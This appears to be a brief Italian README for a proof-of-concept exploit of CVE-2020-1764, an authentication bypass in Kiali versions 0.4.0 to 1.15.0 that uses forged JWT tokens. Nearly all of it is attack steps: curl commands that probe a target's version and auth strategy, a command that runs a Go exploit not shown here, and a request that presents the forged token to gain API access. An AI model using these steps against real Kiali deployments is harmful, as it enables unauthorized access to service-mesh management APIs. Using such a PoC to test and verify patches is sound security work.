
Exploit proof-of-concept per il bypass dell'autenticazione CVE-2020-1764 in Kiali 0.4.0–1.15.0, che consente l'accesso API non autorizzato tramite token JWT manipolati.
PoC di bypass di autenticazione per Kiali 0.4.0 fino a 1.15.0 utilizzando la strategia di autenticazione login (Bollettino di sicurezza)
verifica versione: curl 'http://<IP>/api
verifica strategia auth: curl 'http://<IP>/api/auth/info'
go run ./poc.go
curl 'http://<IP>/api/status' -H "Authorization: Bearer $JWT"